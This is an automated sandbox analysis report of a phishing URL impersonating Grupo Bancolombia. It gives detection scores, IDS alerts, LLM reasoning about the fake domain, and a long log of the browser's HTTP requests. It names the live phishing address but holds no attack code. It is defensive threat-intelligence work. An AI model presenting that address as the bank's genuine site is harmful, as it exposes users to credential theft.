Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://bancolombia-seguridad-co.glitch.me/

Overview

General Information

Sample URL:http://bancolombia-seguridad-co.glitch.me/
Analysis ID:1532604
Tags:openphish
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
AI detected phishing page (G)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2316 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2000,i,8027215415821508008,16941947998853397495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://bancolombia-seguridad-co.glitch.me/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-13T18:20:40.276273+020020275612Possible Social Engineering Attempted3.219.195.7380192.168.2.449736TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://bancolombia-seguridad-co.glitch.me/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: bancolombia-seguridad-co.glitch.meVirustotal: Detection: 9%Perma Link
Source: http://bancolombia-seguridad-co.glitch.me/Virustotal: Detection: 9%Perma Link

Phishing

barindex
Source: http://bancolombia-seguridad-co.glitch.me/LLM: Score: 9 Reasons: The brand 'Grupo Bancolombia' is a well-known financial institution in Colombia., The legitimate domain for Grupo Bancolombia is 'bancolombia.com'., The URL 'bancolombia-seguridad-co.glitch.me' contains extra words and uses a subdomain structure that is not typical for a legitimate financial institution., The use of 'glitch.me' as a domain extension is unusual for a well-known bank and suggests a potential phishing attempt., The presence of 'seguridad' (security) in the URL is a common tactic used in phishing to create a false sense of security. DOM: 0.0.pages.csv
Source: http://bancolombia-seguridad-co.glitch.me/LLM: Score: 8 Reasons: The URL contains the brand name 'bancolombia' but uses a suspicious domain 'glitch.me'., The use of hyphens to separate words in the domain and the '.me' extension raise red flags., Legitimate financial institutions rarely use free hosting services like Glitch., The input fields 'Tipo de Cliente' and 'Ingrese su usuario' are typical for login forms, which are commonly used in phishing attacks to steal credentials. DOM: 0.0.pages.csv
Source: http://bancolombia-seguridad-co.glitch.me/HTTP Parser: No favicon
Source: http://bancolombia-seguridad-co.glitch.me/HTTP Parser: No favicon
Source: http://bancolombia-seguridad-co.glitch.me/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49872 version: TLS 1.2
Source: Network trafficSuricata IDS: 2027561 - Severity 2 - ET PHISHING Generic Miarroba Phishing Landing : 3.219.195.73:80 -> 192.168.2.4:49736
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /pdcc/wp-content/uploads/2024/05/Outlook.jpg HTTP/1.1Host: newsinamerica.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://bancolombia-seguridad-co.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://bancolombia-seguridad-co.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/07/entrevista-adriana-arismendi.jpeg HTTP/1.1Host: mtmarketing.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pdcc/wp-content/uploads/2024/05/Outlook.jpg HTTP/1.1Host: newsinamerica.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /quant.js HTTP/1.1Host: secure.quantserve.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/07/entrevista-adriana-arismendi.jpeg HTTP/1.1Host: mtmarketing.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules-p-d5x2uDVHd7ALE.js HTTP/1.1Host: rules.quantcount.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /quant.js HTTP/1.1Host: secure.quantserve.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules-p-d5x2uDVHd7ALE.js HTTP/1.1Host: rules.quantcount.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel;r=495991433;source=gtm;rf=0;a=p-d5x2uDVHd7ALE;url=http%3A%2F%2Fbancolombia-seguridad-co.glitch.me%2F;ns=0;ce=1;qjs=1;qv=fd657345-20240925114642;ref=;d=bancolombia-seguridad-co.glitch.me;dst=1;et=1728836445054;tzo=240;ogl=;ses=f8a615bd-1eec-46c0-bb58-164a7f33c360;uht=2;fpan=1;fpa=P0-1559252703-1728836443566;pbc=;cm=undefined;gdpr=0;mdl= HTTP/1.1Host: pixel.quantserve.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: http://bancolombia-seguridad-co.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel;r=495991433;source=gtm;rf=0;a=p-d5x2uDVHd7ALE;url=http%3A%2F%2Fbancolombia-seguridad-co.glitch.me%2F;ns=0;ce=1;qjs=1;qv=fd657345-20240925114642;ref=;d=bancolombia-seguridad-co.glitch.me;dst=1;et=1728836445054;tzo=240;ogl=;ses=f8a615bd-1eec-46c0-bb58-164a7f33c360;uht=2;fpan=1;fpa=P0-1559252703-1728836443566;pbc=;cm=undefined;gdpr=0;mdl= HTTP/1.1Host: pixel.quantserve.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: mc=670bf35e-97790-96ec7-2d0a3
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
